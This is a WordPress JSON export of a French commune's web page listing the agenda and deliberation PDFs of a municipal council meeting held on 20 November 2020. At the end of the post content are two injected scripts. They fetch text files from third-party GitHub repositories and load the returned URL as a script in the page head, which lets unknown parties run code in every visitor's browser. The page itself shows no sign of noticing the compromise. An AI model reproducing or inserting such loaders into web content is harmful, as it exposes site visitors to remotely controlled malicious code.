{"id":702,"date":"2020-11-21T18:12:00","date_gmt":"2020-11-21T17:12:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=702"},"modified":"2024-07-29T06:39:15","modified_gmt":"2024-07-29T04:39:15","slug":"conseil-municipal-du-20-novembre-2020","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/","title":{"rendered":"Conseil Municipal du 20 Novembre 2020"},"content":{"rendered":"\n<p><strong>ORDRE DU JOUR&nbsp;:<\/strong><\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" width=\"8\" height=\"11\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\">\u00a0Informations du maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.<br><img loading=\"lazy\" decoding=\"async\" width=\"8\" height=\"11\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\">\u00a0Approbation du proc\u00e8s-verbal du conseil municipal du 18 septembre 2020<br>1. Instauration d\u2019une redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution d\u2019\u00e9lectricit\u00e9.<br>2. Instauration de la redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution de gaz.<br>3. Instauration d\u2019une redevance d\u2019occupation du domaine public par les r\u00e9seaux de t\u00e9l\u00e9communication.<br>4. Instauration d\u2019une redevance d\u2019occupation du domaine public pour les chantiers provisoires d\u2019\u00e9lectricit\u00e9 et de gaz.<br>5. Renouvellement de la convention de mise \u00e0 disposition du service commun d\u2019instruction des actes et autorisation d\u2019urbanisme avec la CCFL.<br>6. Renouvellement de la convention cadre r\u00e9gissant les rapports entre la CCFL et ses communes membres pour l\u2019exercice partage de la comp\u00e9tence voirie.<br>7. Renouvellement des groupements de commandes pour l\u2019achat de biens et de prestations de services avec la CCFL.<br>8. Engagement de la commune dans la d\u00e9marche pour la convention territoriale globale.<br>9. Autorisation de signature de la convention de renouvellement de l\u2019op\u00e9ration \u00ab\u00a0action fruits\u00a0\u00bb pour l\u2019ann\u00e9e scolaire 2020-2021.<br>10. Adh\u00e9sion au groupement de commandes relatif \u00e0 la restauration et \u00e0 la reliure des actes administratifs et\/ou d\u2019\u00e9tat civil.<br>11. D\u00e9signation des repr\u00e9sentants de la commune \u00e0 l\u2019agence iNord.<br>12. Modification du r\u00e8glement int\u00e9rieur des m\u00e9diath\u00e8ques de l\u2019Esperluette.<br>13. Autorisation d\u2019\u00e9limination des \u0153uvres de la m\u00e9diath\u00e8que Medi@lys.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2469\"  _slug=\"ordre-du-jour-de-la-seance-du-20-novembre-2020\" data-title=\"ordre-du-jour-de-la-seance-du-20-novembre-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 20 Novembre 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2469 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_20_11_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2466\"  _slug=\"compte-rendu-du-conseil-municipal-du-20-novembre-2020\" data-title=\"compte-rendu-du-conseil-municipal-du-20-novembre-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte-rendu du Conseil Municipal du 20 Novembre 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2466 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/pv_du_cm_20_11_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2463\"  _slug=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-la-distribution-delectricite\" data-title=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-la-distribution-delectricite\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Redevance d\u2019Occupation du Domaine Public pour la distribution d\u2019\u00e9lectricit\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2463 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_052_2020_rodp_electricite.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2460\"  _slug=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-la-distribution-de-gaz\" data-title=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-la-distribution-de-gaz\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Redevance d\u2019Occupation du Domaine Public pour la distribution de gaz<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2460 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_053_2020_rodp_gaz.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2457\"  _slug=\"deliberation-pour-redevance-doccupation-du-domaine-public-par-telecom\" data-title=\"deliberation-pour-redevance-doccupation-du-domaine-public-par-telecom\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Redevance d\u2019Occupation du Domaine Public par t\u00e9l\u00e9com<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2457 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_054_2020_rodp_telecom.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2454\"  _slug=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-chantiers-provisoires-electricite-gaz\" data-title=\"deliberation-pour-redevance-doccupation-du-domaine-public-pour-chantiers-provisoires-electricite-gaz\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Redevance d\u2019Occupation du Domaine Public pour chantiers provisoires \u00e9lectricit\u00e9 &#038; gaz<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2454 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_055_2020_rodp_chantiers_provisoires.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2451\"  _slug=\"deliberation-pour-convention-ccfl-urbanisme\" data-title=\"deliberation-pour-convention-ccfl-urbanisme\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Convention CCFL Urbanisme<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2451 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_056_2020_convention_ccfl_urbanisme.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2448\"  _slug=\"deliberation-pour-convention-ccfl-voirie\" data-title=\"deliberation-pour-convention-ccfl-voirie\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Convention CCFL Voirie<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2448 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_057_2020_convention_ccfl_voirie.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2445\"  _slug=\"deliberation-pour-achats-de-biens-et-de-services-avec-la-ccfl\" data-title=\"deliberation-pour-achats-de-biens-et-de-services-avec-la-ccfl\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour achats de biens et de services avec la CCFL<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2445 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_058_2020_achat_de_biens_et_de_services.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2442\"  _slug=\"deliberation-pour-engagement-de-la-commune-dans-la-convention-territoriale-globale\" data-title=\"deliberation-pour-engagement-de-la-commune-dans-la-convention-territoriale-globale\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour engagement de la commune dans la Convention Territoriale Globale<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2442 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_059_2020_ctg.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2439\"  _slug=\"deliberation-pour-convention-ccfl-action-fruits\" data-title=\"deliberation-pour-convention-ccfl-action-fruits\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour Convention CCFL \u00ab\u00a0Action Fruits\u00a0\u00bb<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2439 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_060_2020_convention_ccfl_action_fruits.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2436\"  _slug=\"deliberation-pour-adhesion-au-groupement-de-commandes-relatif-a-la-restauration-reliure-actes-administratifs-civils-avec-centre-de-gestion-du-nord\" data-title=\"deliberation-pour-adhesion-au-groupement-de-commandes-relatif-a-la-restauration-reliure-actes-administratifs-civils-avec-centre-de-gestion-du-nord\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour adh\u00e9sion au groupement de commandes relatif \u00e0 la restauration &#038; reliure actes administratifs\/civils avec Centre de Gestion du Nord<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2436 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_061_2020_actes_etat_civil_cdg59.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2433\"  _slug=\"deliberation-pour-designation-des-representants-de-la-commune-a-lagence-inord\" data-title=\"deliberation-pour-designation-des-representants-de-la-commune-a-lagence-inord\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour d\u00e9signation des repr\u00e9sentants de la commune \u00e0 l\u2019agence INord<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2433 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_062_2020_representants_inord.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2430\"  _slug=\"deliberation-pour-modification-du-reglement-interieur-de-la-mediatheque\" data-title=\"deliberation-pour-modification-du-reglement-interieur-de-la-mediatheque\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour modification du R\u00e8glement Int\u00e9rieur de la m\u00e9diath\u00e8que<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2430 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_063_2020_modification_ri_mediatheque.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2427\"  _slug=\"deliberation-pour-autorisation-de-lelimination-des-oeuvres-a-la-mediatheque\" data-title=\"deliberation-pour-autorisation-de-lelimination-des-oeuvres-a-la-mediatheque\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour autorisation de l\u2019\u00e9limination des \u0153uvres \u00e0 la m\u00e9diath\u00e8que<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2427 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/delib_064_2020_elimination_des_oeuvres_medialys.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR&nbsp;: \u00a0Informations du maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.\u00a0Approbation du proc\u00e8s-verbal du conseil municipal du 18 septembre 20201. Instauration d\u2019une redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution d\u2019\u00e9lectricit\u00e9.2. Instauration de la redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution de gaz.3. Instauration d\u2019une redevance d\u2019occupation du domaine public par les r\u00e9seaux de t\u00e9l\u00e9communication.4. Instauration d\u2019une redevance d\u2019occupation du domaine public pour les chantiers provisoires d\u2019\u00e9lectricit\u00e9 et de gaz.5. Renouvellement de la convention de mise \u00e0 disposition du service commun d\u2019instruction des actes et autorisation d\u2019urbanisme avec la CCFL.6. Renouvellement de la convention cadre r\u00e9gissant les rapports entre la CCFL et ses communes membres pour l\u2019exercice partage de la comp\u00e9tence voirie.7. Renouvellement des groupements de commandes pour l\u2019achat de biens et de prestations de services avec la CCFL.8. Engagement de la commune dans la d\u00e9marche pour la convention territoriale globale.9. Autorisation de signature de la convention de renouvellement de l\u2019op\u00e9ration \u00ab\u00a0action fruits\u00a0\u00bb pour l\u2019ann\u00e9e scolaire 2020-2021.10. Adh\u00e9sion au groupement de commandes relatif \u00e0 la restauration et \u00e0 la reliure des actes administratifs et\/ou d\u2019\u00e9tat civil.11. D\u00e9signation des repr\u00e9sentants de la commune \u00e0 l\u2019agence iNord.12. Modification du r\u00e8glement int\u00e9rieur des m\u00e9diath\u00e8ques de l\u2019Esperluette.13. Autorisation d\u2019\u00e9limination des \u0153uvres de la m\u00e9diath\u00e8que Medi@lys.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-702","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR&nbsp;: \u00a0Informations du maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.\u00a0Approbation du proc\u00e8s-verbal du conseil municipal du 18 septembre 20201. Instauration d\u2019une redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution d\u2019\u00e9lectricit\u00e9.2. Instauration de la redevance d\u2019occupation du domaine public par les ouvrages des r\u00e9seaux publics de transport et de distribution de gaz.3. Instauration d\u2019une redevance d\u2019occupation du domaine public par les r\u00e9seaux de t\u00e9l\u00e9communication.4. Instauration d\u2019une redevance d\u2019occupation du domaine public pour les chantiers provisoires d\u2019\u00e9lectricit\u00e9 et de gaz.5. Renouvellement de la convention de mise \u00e0 disposition du service commun d\u2019instruction des actes et autorisation d\u2019urbanisme avec la CCFL.6. Renouvellement de la convention cadre r\u00e9gissant les rapports entre la CCFL et ses communes membres pour l\u2019exercice partage de la comp\u00e9tence voirie.7. Renouvellement des groupements de commandes pour l\u2019achat de biens et de prestations de services avec la CCFL.8. Engagement de la commune dans la d\u00e9marche pour la convention territoriale globale.9. Autorisation de signature de la convention de renouvellement de l\u2019op\u00e9ration \u00ab\u00a0action fruits\u00a0\u00bb pour l\u2019ann\u00e9e scolaire 2020-2021.10. Adh\u00e9sion au groupement de commandes relatif \u00e0 la restauration et \u00e0 la reliure des actes administratifs et\/ou d\u2019\u00e9tat civil.11. D\u00e9signation des repr\u00e9sentants de la commune \u00e0 l\u2019agence iNord.12. Modification du r\u00e8glement int\u00e9rieur des m\u00e9diath\u00e8ques de l\u2019Esperluette.13. Autorisation d\u2019\u00e9limination des \u0153uvres de la m\u00e9diath\u00e8que Medi@lys.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/11\/21\/conseil-municipal-du-20-novembre-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2020-11-21T17:12:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 20 Novembre 2020\",\"datePublished\":\"2020-11-21T17:12:00+00:00\",\"dateModified\":\"2024-07-29T04:39:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/\"},\"wordCount\":274,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/\",\"name\":\"Conseil Municipal du 20 Novembre 2020 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2020-11-21T17:12:00+00:00\",\"dateModified\":\"2024-07-29T04:39:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/11\\\/21\\\/conseil-municipal-du-20-novembre-2020\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 20 Novembre 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune 